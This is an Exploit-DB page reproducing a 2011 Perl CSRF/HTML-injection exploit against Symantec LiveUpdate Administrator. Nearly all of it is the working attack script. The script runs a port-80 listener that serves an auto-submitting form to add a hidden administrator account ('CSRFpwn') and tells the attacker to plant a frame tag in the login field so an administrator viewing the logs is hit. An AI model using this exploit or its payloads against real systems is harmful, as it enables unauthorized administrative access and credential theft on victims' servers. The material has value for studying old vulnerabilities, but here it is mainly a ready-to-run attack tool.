Symantec LiveUpdate Administrator Management GUI – HTML Injection

• Exploit Database
• 8 阅读

• 作者： Nikolas Sotiriu
  日期： 2011-03-23
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17026/

• source: https://www.securityfocus.com/bid/46856/info
  
  Symantec LiveUpdate Administrator is prone to an HTML-injection vulnerability.
  
  Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
  
  
  #!/usr/bin/perl
  
  ##
  #Title: Symantec Live Update Administrator CSRF Exploit
  #Name:luaCSRF.pl
  #Author:Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
  #
  #Use it only for education or ethical pentesting! The author accepts
  #no liability for damage caused by this tool.
  #
  ##
  
  
  use Socket;
  use IO::Handle;
  use Getopt::Std;
  
  my %args;
  getopt('g:h:', \%args);
  
  my $payload = $args{g} || usage();
  my $victim= $args{h} || usage();
  
  banner();
  
  if ($payload eq "1") {
  print "[+] Using the Alert Box payload\n";
  # Alert Box
  $html = <<ENDHTML;
  <html>
  <SCRIPT LANGUAGE="JavaScript">alert('!!!XSS/CSRF vulnerability!!!')</SCRIPT>
  </html>
  
  ENDHTML
  
  } elsif ($payload eq "2") {
  print "[+] Using the add admin user payload\n";
  # Adds the user CSRFpwn with password 12345678
  $html = <<ENDHTML;
  <html>
  <body onload="document.csrf.submit();">
  <form name="csrf" action="http://$victim:7070/lua/adduser.do" method="post">
  <input type="hidden" name="dispatch" value="save" />
  <input type="hidden" name="username" value="CSRFpwn" />
  <input type="hidden" name="password" value="12345678"/>
  <input type="hidden" name="verifyPassword" value="12345678"/>
  <input type="hidden" name="lastname" value="junk" />
  <input type="hidden" name="firstname" value="junk" />
  <input type="hidden" name="email" value="junk&#64;junk.com" />
  <input type="hidden" name="userRole" value="1" />
  </form>
  </body>
  </html>
  
  ENDHTML
  
  }
  
  my $protocol = getprotobyname('tcp');
  
  socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "[-] socket() failed: $!";
  setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "[-] Can't set SO_REUSEADDR: $!";
  my $my_addr = sockaddr_in(80,INADDR_ANY);
  bind(SOCK,$my_addr) or die "[-] bind() failed: $!";
  listen(SOCK,SOMAXCONN) or die "[-] listen() failed: $!";
  warn "[+] waiting for incoming connections on port 80...\n";
  warn "[+] Enter the following String in the LUA username login field\n";
  warn "[+] (e.q. HTTP/SSH) and wair for the admin to view the Logs\n";
  warn "[+]\n";
  warn "[+] <frame src=http://<LOCAL_ADDRESS>/.html>\n";
  
  $repeat = 1;
  $victim = inet_aton("0.0.0.0");
  while($repeat) {
  my $remote_addr = accept(SESSION,SOCK);
  my ($port,$hisaddr) = sockaddr_in($remote_addr);
  warn "[+] Connection from [",inet_ntoa($hisaddr),",$port]\n";
  $victim = $hisaddr;
  SESSION->autoflush(1);
  if(<SESSION>) {
   print SESSION $http_header . $html;
  }
  warn "[+] Connection from [",inet_ntoa($hisaddr),",$port] finished\n";
  close SESSION;
  }
  
  sub usage {
  print $payload;
  print "\n";
  print " luaCSRF.pl - Symantec LUA CSRF Exploit\n";
  print "===============================================================\n\n";
  print "Usage:\n";
  print " $0 -g <payload> -h <lua-ip>\n";
  print "Optional:\n";
  print " -p <local port to listen on>\n";
  print " -g (1|2) <payload to use>\n";
  print "1 <Execute an alert box\n";
  print "2 <Add the Admin User \"CSRFpwn\">\n";
  print "Notes:\n";
  print " -nothing here\n";
  print "\n";
  print "Author:\n";
  print " Nikolas Sotiriu (lofi)\n";
  print " url: www.sotiriu.de\n";
  print " mail: lofi[at]sotiriu.de\n";
  print "\n";
  
  
  exit(1);
  }
  
  sub banner {
  print STDERR << "EOF";
  --------------------------------------------------------------------------------
   luaCSRF.pl - Symantec LUA CSRF Exploit
  --------------------------------------------------------------------------------
  
   111 1111111
  11100 101 00110111001111
  11101 11 10 111 101 1001111111
  110111 00 10 1111 111 1111111101
   10111 1 10 11 100 101 1 11111111011
  11111 1 10001 01 01 1 1 111 1111011101
  1000 0 11 10 100 10 11 111 11111 11 1111 111100
  1111111111 01 10 10 11 01 011 11111111111 1 111111
   10111110 001 00 11 1110 11 10 11111111111 11 1111111 111
  101111111 0 1001 11 1 11 0 10 11 1111111111111111 1111110000111
  011111 0110 10 100 11 1 11 01 01 111111111111111 1 11110011001
   1011111 0110 10 11 1110 11 1 10 111111111111111111111 100001
   1011111 0 10 10 01 10 1 11 1 111111111111111111111111 001101
  011111 000 11 0 1111 0 11 0111111111111111111111111101
   1111111 01 01 1111 1111 1 11 1111111111111111111111 1101 1111
  111 1111 100 111110 0111 0 10111111111111111111111 11111 1111
   111 11111111 1 1 1111 11 111111111111111111111111101001
  111 1011111 1 11111111110111111111111111111111111111111 01 10111001
   11 110010110110100011110111111111111111110 111 11100
  11100101110100101 011111111111111111001 11111101
  110000 1011000011 1011 1111 1111111000 1111111 0
  11 000 1011100001101000 1 1001 0000111101
  0110111111 1011 01100010111011 10
  10111 10010000011 1010
   1001111100 1111 101 11
  1110 01 101011 1001100
   11110000111111
  11000001111
   1
  
  EOF
  }